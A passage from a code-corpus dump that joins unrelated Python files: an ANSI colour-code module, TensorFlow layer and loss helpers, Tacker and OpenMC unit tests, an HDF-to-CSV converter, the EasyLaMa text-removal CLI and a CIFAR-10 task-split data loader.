    # Using our ngram model and the number of sentences we will generate m number of random sentences
    generate_random_sentences(m, ngram_model)
| 3.234375 | 3 |
renkler.py | 0xberkay/renkler | 1 | 12769670 | #<NAME>
#<EMAIL>
#github.com/bksec
#####################################
###############RENKLER###############
#####################################
# ANSI terminal escape codes, named in Turkish.
# Foreground colours ("sifirla" = reset).
sifirla = '\033[0m'
beyaz = '\033[37m'
kirmizi= '\033[31m'
turuncu = '\u001b[38;5;208m'
yesil= '\033[32m'
sari= '\033[33m'
lacivert= '\033[34m'
pembe= '\033[35m'
mor = '\u001b[38;5;165m'
mavi= '\u001b[38;5;32m'
siyah = '\033[90m'
kahverengi = '\u001b[38;5;95m'
aciksari = '\u001b[38;5;228m'
gri = '\u001b[38;5;246m'
turkuaz = '\u001b[38;5;45m'
# Prefix "p" = parlak (bright foreground colours).
pmavi = '\033[96m'#p --> parlak
pkirmizi= '\033[91m'
pyesil = '\033[92m'
psari = '\033[93m'
# Prefix "a" = arkaplan (background colours).
asiyah= '\033[40m'#a --> arkaplan
akirmizi= '\033[41m'
ayesil= '\033[42m'
asari= '\033[43m'
alacivert= '\033[44m'
amor= '\033[45m'
amavi= '\033[46m'
abeyaz= '\033[47m'
# Prefix "ap" = arkaplan-parlak (bright background colours).
apsiyah= '\033[100m'#a --> arkaplan-parlak
apkirmizi= '\033[101m'
apyesil= '\033[102m'
apsari= '\033[103m'
aplacivert= '\033[104m'
apmor= '\033[105m'
apmavi= '\033[106m'
apbeyaz= '\033[107m'
apsifirla= '\033[0;49m'
#yazi sekilleri (text styles: bold, underline, blink)
kalin = '\033[1m'
altcizgi = '\033[4m'
parlak = '\033[5m'
# All codes with their names appended, for demo/listing purposes.
tum_renkler=("\033[0msifirla","\033[37mbeyaz","\033[31mkirmizi","\u001b[38;5;208mturuncu","\033[32myesil","\033[33msari","\033[34mlacivert","\033[35mpembe","\u001b[38;5;165mmor","\u001b[38;5;32mmavi","\033[90msiyah","\u001b[38;5;228maciksari","\u001b[38;5;246mgri","\u001b[38;5;95mkahverengi","\033[96mpmavi","\033[91mpkirmizi","\033[92mpyesil","\033[93mpsari\033[0m","\033[40masiyah","\033[41makirmizi","\033[42mayesil","\033[43masari","\033[44malacivert","\033[45mamor","\033[46mamavi","\033[47mabeyaz","\033[101mapkirmizi","\033[102mapyesil","\033[103mapsari","\033[104maplacivert","\033[105mapmor","\033[106mapmavi","\033[107mapbeyaz","\033[0;49mapsifirla","\033[1mkalin","\033[4maltcizgi\033[0m","\033[5mparlak")
def rastgeleRenkler(*rastgele):
    """Pick and return one colour code at random from the given arguments."""
    import random
    secenekler = list(rastgele)
    return random.choice(secenekler)
| 1.226563 | 1 |
nlp/nn.py | hanxiao/tf-attentive-conv | 34 | 12769671 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# <NAME> <<EMAIL>> <https://hanxiao.github.io>
import tensorflow as tf
# Default weight initializer: Xavier/Glorot-style uniform scaling
# (factor 1.0, averaged fan-in/fan-out).
initializer = tf.contrib.layers.variance_scaling_initializer(factor=1.0,
                                                             mode='FAN_AVG',
                                                             uniform=True,
                                                             dtype=tf.float32)

# He-style initializer for ReLU layers (factor 2.0, fan-in, truncated normal).
initializer_relu = tf.contrib.layers.variance_scaling_initializer(factor=2.0,
                                                                  mode='FAN_IN',
                                                                  uniform=False,
                                                                  dtype=tf.float32)

# Default L2 weight-decay regularizer used throughout this module.
regularizer = tf.contrib.layers.l2_regularizer(scale=3e-7)
def minus_mask(x, mask, offset=1e30):
    """
    masking by subtract a very large number

    Useful before a softmax/max: masked (mask == 0) positions are pushed
    towards -offset and so contribute (almost) nothing.

    :param x: sequence data in the shape of [B, L, D]
    :param mask: 0-1 mask in the shape of [B, L]
    :param offset: very large negative number
    :return: masked x
    """
    return x - tf.expand_dims(1.0 - mask, axis=-1) * offset
def mul_mask(x, mask):
    """
    masking by multiply zero

    Zeroes out every feature vector at positions where mask == 0 (e.g. padding).

    :param x: sequence data in the shape of [B, L, D]
    :param mask: 0-1 mask in the shape of [B, L]
    :return: masked x
    """
    return x * tf.expand_dims(mask, axis=-1)
def masked_reduce_mean(x, mask):
    """Mean over the length axis counting only positions where mask == 1."""
    return tf.reduce_sum(mul_mask(x, mask), axis=1) / tf.reduce_sum(mask, axis=1, keepdims=True)
def masked_reduce_max(x, mask):
    """Max over the length axis; masked positions are pushed to ~-1e30 first."""
    return tf.reduce_max(minus_mask(x, mask), axis=1)
def weighted_sparse_softmax_cross_entropy(labels, preds, weights):
    """
    computing sparse softmax cross entropy by weighting differently on classes

    Per-example weights come from get_bounded_class_weight (1.0 when
    `weights` is None).

    :param labels: sparse label in the shape of [B], size of label is L
    :param preds: logit in the shape of [B, L]
    :param weights: weight in the shape of [L]
    :return: weighted sparse softmax cross entropy in the shape of [B]
    """
    return tf.losses.sparse_softmax_cross_entropy(labels,
                                                  logits=preds,
                                                  weights=get_bounded_class_weight(labels, weights))
def get_bounded_class_weight(labels, weights, ub=None):
    """Gather per-example class weights and bound them.

    Weights are rescaled so the smallest equals 1, log-damped via
    1 + log1p(w), and clipped to [1, ub] (ub defaults to num_classes / 2).
    Returns the scalar 1.0 when `weights` is None (unweighted loss).
    """
    if weights is None:
        return 1.0
    else:
        w = tf.gather(weights, labels)
        w = w / tf.reduce_min(w)
        w = tf.clip_by_value(1.0 + tf.log1p(w),
                             clip_value_min=1.0,
                             clip_value_max=ub if ub is not None else tf.cast(tf.shape(weights)[0], tf.float32) / 2.0)
        return w
def weighted_smooth_softmax_cross_entropy(labels, num_labels, preds, weights,
                                          epsilon=0.1):
    """
    computing smoothed softmax cross entropy by weighting differently on classes

    Labels are one-hot encoded and label-smoothed by `epsilon` before the
    loss; per-example weights come from get_bounded_class_weight.

    :param epsilon: smoothing factor
    :param num_labels: maximum number of labels
    :param labels: sparse label in the shape of [B], size of label is L
    :param preds: logit in the shape of [B, L]
    :param weights: weight in the shape of [L]
    :return: weighted sparse softmax cross entropy in the shape of [B]
    """
    return tf.losses.softmax_cross_entropy(tf.one_hot(labels, num_labels),
                                           logits=preds,
                                           label_smoothing=epsilon,
                                           weights=get_bounded_class_weight(labels, weights))
def get_var(name, shape, dtype=tf.float32,
            initializer_fn=initializer,
            regularizer_fn=regularizer, **kwargs):
    """tf.get_variable shorthand with this module's default initializer/regularizer."""
    return tf.get_variable(name, shape,
                           initializer=initializer_fn,
                           dtype=dtype,
                           regularizer=regularizer_fn, **kwargs)
def layer_norm(inputs,
               epsilon=1e-8,
               scope=None,
               reuse=None):
    """Applies layer normalization.

    Args:
      inputs: A tensor with 2 or more dimensions, where the first dimension has
        `batch_size`.
      epsilon: A floating number. A very small number for preventing ZeroDivision Error.
      scope: Optional scope for `variable_scope`.
      reuse: Boolean, whether to reuse the weights of a previous layer
        by the same name.

    Returns:
      A tensor with the same shape and data dtype as `inputs`.
    """
    with tf.variable_scope(scope or 'Layer_Normalize', reuse=reuse):
        params_shape = inputs.get_shape()[-1:]
        mean, variance = tf.nn.moments(inputs, [-1], keep_dims=True)
        # BUG FIX: the original created beta/gamma with tf.Variable, which
        # ignores the variable scope's `reuse` flag and allocates fresh
        # (unnamed) parameters on every call; tf.get_variable honours `reuse`
        # so the scale/shift can actually be shared.
        beta = tf.get_variable('beta', params_shape,
                               initializer=tf.zeros_initializer())
        gamma = tf.get_variable('gamma', params_shape,
                                initializer=tf.ones_initializer())
        normalized = (inputs - mean) / ((variance + epsilon) ** .5)
        outputs = gamma * normalized + beta
    return outputs
def linear_logit(x, units, act_fn=None, dropout_keep=1., use_layer_norm=False, scope=None, **kwargs):
    """Dense layer with optional activation, dropout and layer normalisation."""
    with tf.variable_scope(scope or 'linear_logit'):
        logit = tf.layers.dense(x, units=units, activation=act_fn,
                                kernel_initializer=initializer,
                                kernel_regularizer=regularizer)
        # do dropout
        logit = tf.nn.dropout(logit, keep_prob=dropout_keep)
        if use_layer_norm:
            logit = tf.contrib.layers.layer_norm(logit)
        return logit
def bilinear_logit(x, units, act_fn=None,
                   first_units=256,
                   first_act_fn=tf.nn.relu, scope=None, **kwargs):
    """Two stacked linear_logit layers: a hidden projection, then the output logit."""
    with tf.variable_scope(scope or 'bilinear_logit'):
        first = linear_logit(x, first_units, act_fn=first_act_fn, scope='first', **kwargs)
        return linear_logit(first, units, scope='second', act_fn=act_fn, **kwargs)
def label_smoothing(inputs, epsilon=0.1):
    """Smooth one-hot labels. See https://arxiv.org/abs/1512.00567.

    Each entry keeps (1 - epsilon) of its value and receives an equal share
    epsilon / V of the smoothing mass, where V is the size of the last axis,
    e.g. [0, 0, 1] -> [0.033, 0.033, 0.933] for epsilon = 0.1.

    Args:
      inputs: A 3d tensor with shape of [N, T, V], where V is the number of vocabulary.
      epsilon: Smoothing rate.
    """
    num_channels = inputs.get_shape().as_list()[-1]
    scaled = (1 - epsilon) * inputs
    return scaled + (epsilon / num_channels)
def normalize_by_axis(x, axis, smooth_factor=1e-5):
    """Additively smooth x, then normalise it to sum to 1 along `axis`."""
    x += smooth_factor
    return x / tf.reduce_sum(x, axis, keepdims=True)  # num A x num B
def get_cross_correlated_mat(num_out_A, num_out_B, learn_cooc='FIXED', cooc_AB=None, scope=None, reuse=None):
    """Build (p(A|B), p(B|A)) conditional matrices from a co-occurrence matrix.

    learn_cooc modes:
      'FIXED'    - normalise the provided cooc_AB along each axis.
      'JOINT'    - learn one shared non-negative co-occurrence matrix.
      'DISJOINT' - learn two separate matrices, one per conditional.
    Raises NotImplementedError for any other mode.
    """
    with tf.variable_scope(scope or 'CrossCorrlated_Mat', reuse=reuse):
        if learn_cooc == 'FIXED' and cooc_AB is not None:
            pB_given_A = normalize_by_axis(cooc_AB, 1)
            pA_given_B = normalize_by_axis(cooc_AB, 0)
        elif learn_cooc == 'JOINT':
            share_cooc = tf.nn.relu(get_var('cooc_ab', shape=[num_out_A, num_out_B]))
            pB_given_A = normalize_by_axis(share_cooc, 1)
            pA_given_B = normalize_by_axis(share_cooc, 0)
        elif learn_cooc == 'DISJOINT':
            cooc1 = tf.nn.relu(get_var('pb_given_a', shape=[num_out_A, num_out_B]))
            cooc2 = tf.nn.relu(get_var('pa_given_b', shape=[num_out_A, num_out_B]))
            pB_given_A = normalize_by_axis(cooc1, 1)
            pA_given_B = normalize_by_axis(cooc2, 0)
        else:
            raise NotImplementedError
        return pA_given_B, pB_given_A
def get_self_correlated_mat(num_out_A, scope=None, reuse=None):
    """Learnable symmetric self-correlation matrix: C @ C^T + I."""
    with tf.variable_scope(scope or 'Self_Correlated_mat', reuse=reuse):
        # Small-scale initialisation and stronger L2 than the module default.
        cooc1 = get_var('pa_corr', shape=[num_out_A, num_out_A],
                        initializer_fn=tf.contrib.layers.variance_scaling_initializer(factor=0.1,
                                                                                      mode='FAN_AVG',
                                                                                      uniform=True,
                                                                                      dtype=tf.float32),
                        regularizer_fn=tf.contrib.layers.l2_regularizer(scale=3e-4))
        return tf.matmul(cooc1, cooc1, transpose_b=True) + tf.eye(num_out_A)
def gate_filter(x, scope=None, reuse=None):
    """Zero out entries of x that do not exceed a learned scalar threshold.

    NOTE(review): the greater-than comparison is non-differentiable, so
    gradients flow only through the kept entries of x, not through
    `threshold` itself — confirm this is intended.
    """
    with tf.variable_scope(scope or 'Gate', reuse=reuse):
        threshold = get_var('threshold', shape=[])
        gate = tf.cast(tf.greater(x, threshold), tf.float32)
        return x * gate
from tensorflow.python.ops import array_ops
def focal_loss(prediction_tensor, target_tensor, weights=None, alpha=0.25, gamma=2):
    r"""Compute the multi-label focal loss for predictions.

    FL = -alpha * (z - p)^gamma * log(p) - (1 - alpha) * p^gamma * log(1 - p)
    with p = sigmoid(prediction_tensor) and z = target_tensor.

    Args:
      prediction_tensor: float logits, [batch_size, num_anchors, num_classes].
      target_tensor: one-hot targets, same shape as prediction_tensor.
      weights: accepted for interface compatibility; not used in the formula.
      alpha: balancing hyper-parameter (default 0.25).
      gamma: focusing hyper-parameter (default 2).

    Returns:
      A scalar tensor: the focal loss summed over all entries.
    """
    p = tf.nn.sigmoid(prediction_tensor)
    zeros = array_ops.zeros_like(p, dtype=p.dtype)
    # target_tensor > 0 <=> z = 1 (positive entry).
    is_positive = target_tensor > zeros
    # Positives contribute via (z - p); negatives via p; the other part is 0.
    pos_term = array_ops.where(is_positive, target_tensor - p, zeros)
    neg_term = array_ops.where(is_positive, zeros, p)
    log_p = tf.log(tf.clip_by_value(p, 1e-8, 1.0))
    log_one_minus_p = tf.log(tf.clip_by_value(1.0 - p, 1e-8, 1.0))
    per_entry_cross_ent = - alpha * (pos_term ** gamma) * log_p \
                          - (1 - alpha) * (neg_term ** gamma) * log_one_minus_p
    return tf.reduce_sum(per_entry_cross_ent)
def spatial_dropout(x, scope=None, reuse=None):
    """Drop one randomly chosen channel of x (last axis) and rescale the rest.

    NOTE(review): unlike standard dropout this always drops exactly one
    channel and has no training/inference switch — confirm callers only
    apply it during training.
    """
    input_dim = x.get_shape().as_list()[-1]
    with tf.variable_scope(scope or 'spatial_dropout', reuse=reuse):
        # Pick a single channel index uniformly at random.
        d = tf.random_uniform(shape=[1], minval=0, maxval=input_dim, dtype=tf.int32)
        # 0 at the dropped channel, 1 everywhere else.
        f = tf.one_hot(d, on_value=0., off_value=1., depth=input_dim)
        g = x * f # do dropout
        g *= (1. + 1. / input_dim) # do rescale
        return g
def get_last_output(output, seq_length, scope=None, reuse=None):
    """Get the last value of the returned output of an RNN.
    http://disq.us/p/1gjkgdr
    output: [batch x number of steps x ... ] Output of the dynamic lstm.
    sequence_length: [batch] Length of each of the sequence.
    """
    with tf.variable_scope(scope or 'gather_nd', reuse=reuse):
        rng = tf.range(0, tf.shape(seq_length)[0])
        # Pair each batch row with its last valid timestep (length - 1).
        indexes = tf.stack([rng, seq_length - 1], 1)
        return tf.gather_nd(output, indexes)
def get_lstm_init_state(batch_size, num_layers, num_units, direction, scope=None, reuse=None, **kwargs):
    """Learnable initial (c, h) LSTM state, tiled across the batch.

    Returned shapes are [num_layers * num_dirs, batch_size, num_units],
    where num_dirs is 2 for a 'bi...' direction and 1 otherwise.
    """
    with tf.variable_scope(scope or 'lstm_init_state', reuse=reuse):
        num_dir = 2 if direction.startswith('bi') else 1
        c = get_var('lstm_init_c', shape=[num_layers * num_dir, num_units])
        c = tf.tile(tf.expand_dims(c, axis=1), [1, batch_size, 1])
        h = get_var('lstm_init_h', shape=[num_layers * num_dir, num_units])
        h = tf.tile(tf.expand_dims(h, axis=1), [1, batch_size, 1])
        return c, h
def dropout_res_layernorm(x, fx, act_fn=tf.nn.relu,
                          dropout_keep_rate=1.0,
                          residual=False,
                          normalize_output=False,
                          scope='rnd_block',
                          reuse=None, **kwargs):
    """Post-process a block output fx: dropout, optional residual x + fx, optional layer norm.

    When `residual` is set and the feature dims of x and fx differ, x is first
    projected with a 1x1 convolution.  `act_fn` (if given) is applied to the
    residual sum only; without `residual` the (dropped-out) fx passes through.
    """
    with tf.variable_scope(scope, reuse=reuse):
        input_dim = x.get_shape().as_list()[-1]
        output_dim = fx.get_shape().as_list()[-1]
        # do dropout
        fx = tf.nn.dropout(fx, keep_prob=dropout_keep_rate)
        if residual and input_dim != output_dim:
            res_x = tf.layers.conv1d(x,
                                     filters=output_dim,
                                     kernel_size=1,
                                     activation=None,
                                     name='res_1x1conv')
        else:
            res_x = x
        if residual and act_fn is None:
            output = fx + res_x
        elif residual and act_fn is not None:
            output = act_fn(fx + res_x)
        else:
            output = fx
        if normalize_output:
            output = layer_norm(output)
        return output
| 2.625 | 3 |
tacker/tests/unit/vnfm/policy_actions/respawn/test_respawn.py | takahashi-tsc/tacker | 116 | 12769672 | <reponame>takahashi-tsc/tacker
# Copyright (c) 2014-2018 China Mobile (SuZhou) Software Technology Co.,Ltd.
# All Rights Reserved
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from unittest import mock
from tacker.common import clients
from tacker import context
from tacker.db.common_services import common_services_db_plugin
from tacker.plugins.common import constants
from tacker.vnfm.infra_drivers.openstack import heat_client as hc
from tacker.vnfm.policy_actions.respawn import respawn as \
policy_actions_respawn
from tacker.vnfm import vim_client
class VNFActionRespawn(testtools.TestCase):
    """Tests for the 'respawn' VNF monitoring policy action."""
    def setUp(self):
        super(VNFActionRespawn, self).setUp()
        self.context = context.get_admin_context()
        # Stub out event persistence so no real DB is needed.
        mock.patch('tacker.db.common_services.common_services_db_plugin.'
                   'CommonServicesPluginDb.create_event'
                   ).start()
        self._cos_db_plugin =\
            common_services_db_plugin.CommonServicesPluginDb()
    @mock.patch.object(clients.OpenstackClients, 'heat')
    @mock.patch.object(hc.HeatClient, 'delete')
    @mock.patch.object(vim_client.VimClient, 'get_vim')
    def test_execute_action(self, mock_get_vim, mock_hc_delete, mock_heat):
        """execute_action() should log a monitor event, resolve the VIM,
        recreate the VNF and mark the old instance dead."""
        action_respawn = policy_actions_respawn.VNFActionRespawn()
        # Minimal VNF record carrying the fields execute_action reads.
        vnf_dict = {
            'id': 'fake-id',
            'status': 'fake-status',
            'attributes': {
                'monitoring_policy': 'fake-monitoring-policy',
                'failure_count': '1',
                'dead_instance_id_1': '00000000-0000-0000-0000-00000000001'},
            'vim_id': 'fake-vim-id',
            'vim_auth': 'fake-vim-auth',
            'instance_id': '00000000-0000-0000-0000-000000000002',
            'placement_attr': {
                'region_name': 'fake-region-name'}}
        mock_get_vim.return_value = {'vim_auth': {
            'auth_url': 'http://fake-url/identity/v3'
        }}
        mock_hc_delete.return_value = True
        plugin = mock.Mock()
        plugin._mark_vnf_dead.return_value = True
        plugin.create_vnf_sync.return_value = {'id': 'fake-id'}
        plugin._vnf_monitor = mock.Mock()
        action_respawn.execute_action(plugin, self.context, vnf_dict, None)
        # The action must record exactly one monitor event ...
        self._cos_db_plugin.create_event.assert_called_once_with(
            self.context, res_id=vnf_dict['id'],
            res_state=vnf_dict['status'],
            res_type=constants.RES_TYPE_VNF,
            evt_type=constants.RES_EVT_MONITOR,
            tstamp=mock.ANY, details="ActionRespawnHeat invoked")
        # ... resolve the VIM, recreate the VNF and mark the old one dead.
        mock_get_vim.assert_called_once_with(self.context, vnf_dict['vim_id'])
        plugin.create_vnf_sync.assert_called_with(self.context, vnf_dict)
        plugin._vnf_monitor.mark_dead.assert_called_once_with(vnf_dict['id'])
| 1.5 | 2 |
tests/unit_tests/dagmc/test.py | ornlneutronimaging/openmc | 0 | 12769673 | import shutil
import numpy as np
import pytest
import openmc
import openmc.capi
from tests import cdtemp
# Skip every test in this module when OpenMC was built without DAGMC support.
pytestmark = pytest.mark.skipif(
    not openmc.capi._dagmc_enabled(),
    reason="DAGMC CAD geometry is not enabled.")
@pytest.fixture(scope="module", autouse=True)
def dagmc_model(request):
    """Build a small DAGMC-backed model and initialize the C API in a temp dir.

    Module-scoped and autouse: all tests in this module run between
    ``openmc.capi.init()`` and ``openmc.capi.finalize()``.
    """
    model = openmc.model.Model()

    # settings
    model.settings.batches = 5
    model.settings.inactive = 0
    model.settings.particles = 100
    model.settings.temperature = {'tolerance': 50.0}
    model.settings.verbosity = 1
    source_box = openmc.stats.Box([ -4, -4, -4 ],
                                  [  4,  4,  4 ])
    source = openmc.Source(space=source_box)
    model.settings.source = source
    model.settings.dagmc = True

    # tally
    tally = openmc.Tally()
    tally.scores = ['total']
    tally.filters = [openmc.CellFilter(1)]
    model.tallies = [tally]

    # materials
    u235 = openmc.Material(name="fuel")
    u235.add_nuclide('U235', 1.0, 'ao')
    u235.set_density('g/cc', 11)
    u235.id = 40
    # explicit material temperature; checked by test_dagmc_temperatures
    u235.temperature = 320

    water = openmc.Material(name="water")
    water.add_nuclide('H1', 2.0, 'ao')
    water.add_nuclide('O16', 1.0, 'ao')
    water.set_density('g/cc', 1.0)
    water.add_s_alpha_beta('c_H_in_H2O')
    water.id = 41

    mats = openmc.Materials([u235, water])
    model.materials = mats

    # location of dagmc file in test directory
    dagmc_file = request.fspath.dirpath() + "/dagmc.h5m"
    # move to a temporary directory so XML/statepoint files don't pollute
    # the source tree; the CAD geometry is copied alongside
    with cdtemp():
        shutil.copyfile(dagmc_file, "./dagmc.h5m")
        model.export_to_xml()
        openmc.capi.init()
        yield
        openmc.capi.finalize()
@pytest.mark.parametrize("cell_id,exp_temp", ((1, 320.0),   # assigned by material
                                              (2, 300.0),   # assigned in dagmc file
                                              (3, 293.6)))  # assigned by default
def test_dagmc_temperatures(cell_id, exp_temp):
    """Each DAGMC cell reports the temperature set by material, file or default."""
    cell = openmc.capi.cells[cell_id]
    assert np.isclose(cell.get_temperature(), exp_temp)
| 2.03125 | 2 |
planet4/hdf2csv.py | CitizenScienceInAstronomyWorkshop/P4_sandbox | 1 | 12769674 | """This script requires to launch a local ipcontroller. If you execute this
locally, do it with `ipcluster start`.
"""
import argparse
import glob
import logging
import os
import sys
import time
from ipyparallel import Client
from ipyparallel.util import interactive
# Configure the root logger at INFO so the progress messages below are visible.
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)
@interactive
def process_fname(fname):
    """Convert one HDF file to CSV next to it (``*.hdf`` -> ``*.csv``).

    pandas is imported inside the function because this code is shipped to
    remote ipyparallel engines via ``@interactive``.
    """
    import pandas as pd
    csv_path = fname[:-3] + 'csv'
    frame = pd.read_hdf(fname, 'df')
    frame.to_csv(csv_path)
def main():
    """Convert every ``*.hdf`` file in a directory to CSV on an ipyparallel cluster.

    Requires a running controller (``ipcluster start``); work is distributed
    through a load-balanced view and progress is polled every 10 seconds.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('directory',
                        help="Provide the directory of the HDF files "
                             "that shall be converted to csv here.")
    args = parser.parse_args()
    root = os.path.abspath(args.directory)
    fnames = glob.glob(os.path.join(root, '*.hdf'))
    logging.info('Found %i files to convert.', len(fnames))
    c = Client()
    lbview = c.load_balanced_view()
    # map_async returns immediately; results.progress counts finished tasks.
    results = lbview.map_async(process_fname, fnames)
    # progress display
    while not results.ready():
        print("{:.1f} %".format(100 * results.progress / len(fnames)))
        sys.stdout.flush()
        time.sleep(10)
    logging.info('Conversion done.')
    # NOTE(review): no ``if __name__ == '__main__': main()`` guard is visible
    # in this chunk — confirm main() is invoked via a console entry point.
| 2.453125 | 2 |
EasyLaMa/utils/cli.py | kanttouchthis/EasyLaMa | 1 | 12769675 | import argparse
from EasyLaMa import TextRemover
from .util import load_image
from .util import load_images
import os
def get_args():
    """Parse command-line options for the EasyLaMa text-removal CLI."""
    p = argparse.ArgumentParser()
    add = p.add_argument
    add("images", nargs="+", help="Images to process. Required")
    add("-e", "--edge", type=int, default=1, help="Extra margin at the edges of detected boxes. Default: 1")
    add("-r", "--radius", type=int, default=1, help="Radius for rounded corners. 0 = no rounding. Default: 1")
    add("-o", "--output", default=".", help="Output folder. Default: . (current dir)")
    add("-of","--output_format", default=None, help="Output format (jpg, png...). Default: same as input")
    add("-s", "--suffix", default="_result", help="Suffix for results. Default: _result")
    add("-m", "--mask_suffix", default=None, help="Suffix for storing mask. Default: don't store mask")
    add("-c", "--copy", action="store_true", help="Copy original image to output folder.")
    add("-d", "--device", default="cuda", help="Device to use (cuda, cuda:0, cpu...). Default: cuda")
    add("-l", "--languages", type=str, nargs="+", default=["en"], help="Languages to detect. See https://www.jaided.ai/easyocr/ for supported languages and their abbreviations. Default: en")
    return p.parse_args()
def cli():
    """CLI entry point: remove detected text from each input image and save results."""
    args = get_args()
    image_names = [os.path.splitext(os.path.basename(image)) for image in args.images]
    images = load_images(args.images)
    tr = TextRemover(languages=args.languages, device=args.device)
    os.makedirs(args.output, exist_ok=True)
    for (image, (name, ext)) in zip(images, image_names):
        # BUG FIX: os.path.splitext returns the extension *with* a leading dot
        # (".png"), while --output_format is documented as "jpg, png..." without
        # one; the old `(args.output_format or ext)` produced names like
        # "foo_resultpng". Normalize so both "png" and ".png" work.
        if args.output_format:
            out_ext = "." + args.output_format.lstrip(".")
        else:
            out_ext = ext
        result_name = os.path.join(args.output, name + args.suffix + out_ext)
        mask_name = os.path.join(args.output, name + (args.mask_suffix or "") + out_ext)
        image_name = os.path.join(args.output, name + out_ext)
        result, mask = tr(image, mask_edge=args.edge, radius=args.radius)
        result.save(result_name)
        if args.mask_suffix:
            mask.save(mask_name)
        if args.copy:
            image.save(image_name)
        print("result: {}{}".format(result_name, ("\nmask: " + mask_name) if args.mask_suffix else ""))
| 2.65625 | 3 |
dataset/cifar10.py | JuliousHurtado/Meta-Iteration | 0 | 12769676 | <reponame>JuliousHurtado/Meta-Iteration
import torch
import random
import copy
import numpy as np
from collections import defaultdict
from PIL import Image
from torchvision import transforms
import torchvision.transforms.functional as F
import learn2learn as l2l
from dataset.datasets_utils import create_bookkeeping
from torchvision import datasets
from PIL import Image
import os
import sys
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
class DatasetGen(object):
    """Builds per-task CIFAR-10 dataloaders for a 3-task continual-learning split.

    Classes are partitioned as [0-3], [4-6], [7-9]; each task gets train/valid/
    test loaders plus an optional learn2learn meta-task loader.
    """

    def __init__(self, args):
        super(DatasetGen, self).__init__()
        self.batch_size = args.batch_size
        self.pc_valid = 0.15          # fraction of the train split held out for validation
        self.root = './data'
        self.args = args
        self.num_task = 3
        self.inputsize = [3,32,32]    # CHW shape of CIFAR-10 images
        self.num_workers = 4
        self.pin_memory = True

        self.taskcla = []             # number of classes per task
        self.labels = [[0,1,2,3],[4,5,6],[7,8,9]]
        for i in range(self.num_task):
            self.taskcla.append(len(self.labels[i]))
        print('taskcla =', self.taskcla)

        self.data_loader = []
        self.set_dataloader()

    def set_dataloader(self):
        """Populate self.data_loader with one loader dict per task."""
        data_transforms = {
            'train': transforms.Compose([
                transforms.Resize(32),
                transforms.RandomHorizontalFlip(),
                transforms.ToTensor(),
                transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
            ]),
            'val': transforms.Compose([
                transforms.Resize(32),
                transforms.ToTensor(),
                transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
            ]),
        }

        for task in range(self.num_task):
            train_dataset = DividedCIFAR10('data', train=True, labels = self.labels[task], transform = data_transforms['train'], args = self.args)
            test_dataset = DividedCIFAR10('data', train=False, labels = self.labels[task], transform = data_transforms['val'], args = self.args)

            # Random train/validation split (pc_valid fraction for validation).
            split = int(np.floor(self.pc_valid * len(train_dataset)))
            train_split, valid_split = torch.utils.data.random_split(train_dataset, [len(train_dataset) - split, split])

            if self.args.meta_learn:
                # Deep copy so meta bookkeeping does not disturb the train set.
                meta_dataset = copy.deepcopy(train_dataset)
                meta_loader = self.get_meta_loader(meta_dataset)
            else:
                meta_loader = None

            train_loader = torch.utils.data.DataLoader(train_split, batch_size=self.batch_size, num_workers=self.num_workers,
                                                       pin_memory=self.pin_memory,shuffle=True)
            valid_loader = torch.utils.data.DataLoader(valid_split, batch_size=self.batch_size,
                                                       num_workers=self.num_workers, pin_memory=self.pin_memory,shuffle=False)
            test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=self.batch_size, num_workers=self.num_workers,
                                                      pin_memory=self.pin_memory,shuffle=False)

            self.data_loader.append({ 'train': train_loader, 'valid': valid_loader, 'test': test_loader, 'meta': meta_loader})

    def get(self, task_id):
        # NOTE(review): task_id is ignored; the full list of per-task loader
        # dicts is returned — confirm callers index into it themselves.
        return self.data_loader

    def get_meta_loader(self, meta_dataset):
        """Wrap a dataset as a learn2learn N-way/K-shot task sampler."""
        create_bookkeeping(meta_dataset, self.args.ways, self.args.meta_label)

        # 2*shots so each sampled task can be split into adaptation/evaluation.
        meta_transforms = [
                    l2l.data.transforms.NWays(meta_dataset, self.args.ways),
                    l2l.data.transforms.KShots(meta_dataset, 2*self.args.shots),
                    l2l.data.transforms.LoadData(meta_dataset),
                    l2l.data.transforms.RemapLabels(meta_dataset),
                    l2l.data.transforms.ConsecutiveLabels(meta_dataset),
                ]
        meta_loader = l2l.data.TaskDataset(l2l.data.MetaDataset(meta_dataset),
                                       task_transforms=meta_transforms)

        return meta_loader
class PermutedMNIST(datasets.MNIST):
    """MNIST with a fixed pixel permutation applied to every flattened image."""

    def __init__(self, root="mnist", train=True, permute_idx=None, transform = None):
        super(PermutedMNIST, self).__init__(root, train, download=True)
        assert len(permute_idx) == 28 * 28
        # Flatten each image, apply the permutation and rescale to [0, 1].
        self.data = torch.stack([img.float().view(-1)[permute_idx] / 255
                                 for img in self.data])
        self.transform = transform

    def __getitem__(self, index):
        img, target = self.data[index], int(self.targets[index])

        if self.transform:
            img = self.transform(img)

        return img, target

    def get_sample(self, sample_size):
        """Return sample_size randomly chosen permuted images (no labels)."""
        sample_idx = random.sample(range(len(self)), sample_size)
        return [img for img in self.data[sample_idx]]
class DividedCIFAR10(datasets.CIFAR10):
    """CIFAR-10 restricted to a subset of class labels (one CL task).

    Targets are remapped to the index of the label inside ``labels`` so each
    task's classes are 0..len(labels)-1. ``args.num_data`` caps the number of
    kept samples (-1 means unlimited).
    """

    def __init__(self, root, train=True,
                 transform=None,
                 target_transform=None,
                 download=True,
                 labels = [],   # NOTE(review): mutable default argument — safe only if never mutated
                 args = None):
        super(DividedCIFAR10, self).__init__(root, train, transform, target_transform, download)

        self.transform = transform
        self.target_transform = None
        self.root = root
        self.train = train  # training set or test set

        #if download:
        #    self.download()

        #if not self._check_integrity():
        #    raise RuntimeError('Dataset not found or corrupted.' +
        #                       ' You can use download=True to download it')

        if self.train:
            downloaded_list = self.train_list
        else:
